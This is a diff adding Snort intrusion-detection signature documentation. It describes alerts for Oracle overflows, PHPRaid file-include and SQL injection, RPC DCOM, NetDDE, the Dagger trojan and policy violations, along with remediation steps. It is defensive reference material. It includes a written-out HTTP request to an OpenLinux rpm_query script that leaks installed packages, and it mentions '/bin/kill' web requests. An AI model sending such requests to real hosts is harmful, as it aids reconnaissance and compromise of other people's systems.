+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure differences
+. This procedure is included in
+sys.dbms_rectifier_diff.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/411.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+411
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP IPV6 I-Am-Here datagram.
+
+--
+
+Impact:
+ICMP Type 34 datagrams are not expected network traffic.  Hosts generating ICMP Type 34 datagrams should be investigated for hostile activity.
+
+--
+
+Detailed Information:
+ICMP Type 34 is an undocumented extension to RFC 1812 and RFC 792.  Its current use it not defined by an approved RFC.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Hosts generating ICMP Type 34 datagrams should be investigated for hostile activity.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000715.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000715
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "logs.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "logs.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1335.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+1335
+
+--
+Summary:
+Attempted kill command access via web
+
+--
+Impact:
+Attempt to stop or restart processes on a webserver.
+
+--
+Detailed Information:
+This is an attempt to either stop or restart system processes on a
+webserver. By stopping a service the attacker can effectively issue a
+"Denial of Service" to a particular process on a machine. When used to
+restart a process, the attacker can force a legitimate process to
+re-read the associated configuration file and possibly compromise the
+service by replacing the original configuration with one crafted by the attacker.
+
+The signature looks for the "kill" command in the client to
+web server network traffic and does not indicate whether the command
+was actually successful in killing the process. The presence of the
+"kill" command in web traffic indicates that an attacker attempted to
+trick the web server into executing system in non-interactive mode
+i.e. without a valid shell session.
+
+Alternatively this rule may trigger in an unencrypted HTTP tunneling
+connection to the server or a shell connection via another exploit
+against the web server.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/kill'
+in the URI which can then return sensitive information on groups and
+users present on the host.  This command may also be requested on a
+command line should the attacker gain access to the machine.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Webservers should not be allowed to view or execute files and binaries
+outside of it's designated web root or cgi-bin. 
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+
+man kill
+
+--
--- /dev/null
+++ b/doc/signatures/105.txt
@@ -0,0 +1,107 @@
+Rule:
+
+--
+Sid:
+105
+
+--
+Summary:
+Dagger is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a 
+compromise of all resources the machine is connected to. This Trojan 
+also has the ability to delete data, steal passwords and disable the 
+machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes 
+changes to the system registry, Win.ini and System.ini. When first 
+executed the Trojan replicates itself and in most cases, gives the copy 
+a random name. This Trojan may use the file extensions ".exe" or ".dll".
+
+The Trojan changes system startup files and registry settings to add the
+server to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	104	Dagger_1.4.0_client_connect (incoming TCP connection)
+	105	Dagger_1.4.0 (outgoing TCP connection)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This 
+event is indicative of an existing infection being activated. Initial 
+compromise can be in the form of a Win32 installation program that may 
+use the extension ".jpg" or ".bmp" when delivered via e-mail for 
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. 
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be 
+attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a 
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	[HKEY_CLASSES_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]
+	[HKEY_CLASSES_USER\Software\Microsoft\Windows\CurrentVersion\Run] 
+	[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+
+Registry keys added are:
+
+	"SysManager"="C:\\WINDOWS\\System\\Manager.exe"
+
+Removal of the file Manager.exe is required. Also end the process 
+Manager.exe.
+
+A machine reboot may be required to clear the existing process from 
+running in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS484
+
+TLSecurity
+http://www.tlsecurity.net/backdoor/Dagger.1.4.html (link appears to be 
+inactive)
+
+Dark-e
+http://www.dark-e.com/archive/trojans/dagger/140/index.shtml
+
+--
--- /dev/null
+++ b/doc/signatures/1763.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1763
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/557.txt
@@ -0,0 +1,93 @@
+Rule:  
+
+--
+
+Sid:
+
+557
+
+--
+
+Summary:
+
+A network-internal server has authenticated an external GNUTella client
+connection attempt and they have begun communications.
+
+--
+
+Impact:
+
+Possible policy violation.
+
+--
+
+Detailed Information:
+
+GNUTella is a P2P (Peer-to-Peer) protocol for exchanging arbitrary
+files.  Depending on your site's policies, using it may be a policy
+violation.
+
+If not properly configured, GNUTella clients may accidentally share out
+confidential files.  GNUTella worms (which use deceptive names to
+encourage download) and viruses may also be accidentally downloaded by a
+client.
+
+This rule being triggered means that a GNUTella server has been detected
+on the protected network.
+
+--
+
+Affected Systems:
+
+Any system with a GNUTella server installed (available for most
+platforms)
+
+--
+
+Attack Scenarios:
+It is possible for an inside attack to take place by using peer-to-peer
+clients to transfer corporate data from an internal resource to an
+external third party.
+
+--
+
+Ease of Attack:
+Simple. This is peer-to-peer activity.
+
+--
+
+False Positives:
+
+This rule detects the term "GNUTELLA OK" on all ports.  As a result, any
+email, web page, or other network content that discusses the protocol
+and its messages will trigger this alert.
+
+--
+
+False Negatives:
+
+None known.
+
+--
+
+Corrective Action:
+
+Depends on acceptable use policies.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Gene R Gomez (gene!AT!gomezbrothers!DOT!com)
+
+-- 
+
+Additional References:
+
+GNUTella
+http://www.gnutella.com
+
+Gnutella Protocol
+http://rfc-gnutella.sourceforge.net/developer/testing/
+
+--
--- /dev/null
+++ b/doc/signatures/1434.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1434
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000725.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000725
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "PHPRaid" application running on a webserver. Access to the file "view.php" with SQL commands being passed as the "raid_id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "raid_id" parameter in the "view.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/3253.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3253
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1167.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+
+1167
+
+--
+Summary:
+
+This event is generated when an attempt is made to gain information on installed packages on OpenLINUX.
+
+--
+Impact:
+
+This is a serious information leak, since an attack could then attempt to determine and exploit any vulnerable packages.
+
+
+--
+Detailed Information:
+
+The OpenLinux CGI package comes with a script called rpm_query. A 
+vulnerability exists which will allow a remote user to list all
+packages/versions installed on the system. This information will be 
+useful for an attacker to further compromise a system.
+
+
+--
+Affected Systems:
+
+	OpenLinux Desktop 2.3        
+        OpenLinux eServer 2.3        
+
+--
+Attack Scenarios:
+
+GET http://target/cgi-bin/rpm_query HTTP/1.0
+
+--
+Ease of Attack:
+
+Simple.
+
+--
+False Positives:
+
+None known.
+
+--
+False Negatives:
+
+None known.
+
+--
+Corrective Action:
+
+Remove the package (/home/httpd/cgi-bin/rpm_query)   
+
+Upgrade to the latest version of OpenLinux (2.3-17 or later), 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1036
+
+--
--- /dev/null
+++ b/doc/signatures/1726.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1726
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1310.txt
@@ -0,0 +1,58 @@
+Rule:  
+--
+Sid:
+
+1310
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "FREE XXX".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "FREE XXX".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/643.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 643
+
+--
+Summary: 
+This event is generated when a buffer overflow attack is attempted against a target machine.
+
+--
+Impact: 
+Serious. The attacker may be able to gain remote access to the system or have the ability to execute arbitrary code with the privileges of a system user.
+
+
+-- 
+Detailed Information: 
+This rule tracks the bit combination which may occur in network packets aimed at overflowing HP-UX UNIX network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+
+--
+Attack Scenarios: 
+An attacker launches an overflow exploit against a vulnerable FTP server and gains the ability to start a shell session, thus obtaining interactive access to the target.
+
+--
+Ease of Attack: 
+Simple
+
+
+--
+False Positives: 
+This event may be generated by legitimate traffic to the specified port.
+
+
+-- 
+False Negatives: 
+This event is specific to the shell code defined in the rule.
+Other shell code sequences may not be detected.
+
+--
+Corrective Action: 
+Check the target host for other signs of compromise.
+
+Look for other events concerning the target host.
+
+Apply vendor supplied patches and keep the operating system up to date.
+
+--
+Contributors: 
+Original Rule Writer Unkown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS359
+
+--
--- /dev/null
+++ b/doc/signatures/3086.txt
@@ -0,0 +1,65 @@
+Rule: 
+
+--
+Sid: 
+3086
+
+-- 
+Summary: 
+This event is generated when an attempt is made to access the file
+spp_sta.stm on a 3com wireless router.
+
+-- 
+
+Impact: 
+Intelligence gathering activity.
+
+--
+Detailed Information:
+The 3Com ADSL wireless router 3CRADSL72 is prone to an authentication
+bypass issue that may allow a malicious third party to gain information
+on the device and the networks it serves. It may also be possible for an
+attacker to gain administrative privileges on the device.
+
+--
+Affected Systems:
+	3Com 3CRADSL72 ADSL wireless router
+
+--
+
+Attack Scenarios: 
+An attacker with access to the page can gain information on the networks
+being served by the router and use the knowledge gained in further
+attacks on the system. The attacker may also be able to gain
+administrative access to the router.
+
+-- 
+Ease of Attack: 
+Simple. No exploit software is required.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+The address of the router should be added to the $HTTP_SERVERS variable
+if the rule is used in the default form. Otherwise a $WIRELESS_ROUTERS
+variable could be used in both the snort.conf and the rule to eliminate
+any possible false positives.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch.
+
+--
+Contributors: 
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3151.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid:
+3151
+
+-- 
+Summary: 
+This event is generated when an attempt is made to access the host
+filestem via fingerd.
+
+-- 
+Impact: 
+Information gathering.
+
+--
+Detailed Information:
+This event is generated when a specific attack against a vulnerable
+version of the finger daemon is detected. 
+
+The Finger daemon is used to provide information about users on a UNIX
+system. A certain version of fingerd shipped with one release of FreeBSD
+4.1.1 contained an added feature that allows a remote user to request
+some files via the use of finger. This event indicates that such a
+request has been made.
+
+The feature also allowed any file or directory structure on the host
+readable by the "nobody" user to also be accessed, leading to
+unauthorized information disclosure.
+
+--
+Affected Systems:
+	FreeBSD 4.1.1 Release
+
+--
+Attack Scenarios:  
+An attacker can use finger to read a directory structure or file by
+making a request via finger.
+
+-- 
+Ease of Attack: 
+Simple, no exploit software is required, just a specially formatted
+finger query.
+
+-- 
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+Corrective Action: 
+Disable the finger daemon or limit the addresses that can access the
+service via a firewall or TCP wrappers.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2960.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2960
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/2368.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+2368
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application PhpGedView.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+PhpGedView contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the PGV_BASE_DIRECTORY
+parameter when making a GET or POST  request to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root.
+
+--
+Affected Systems:
+	PhpGedView 2.65.1 and earlier
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path to the PGV_BASE_DIRECTORY variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1217.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1217
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1567.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1567
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3431.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3431
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
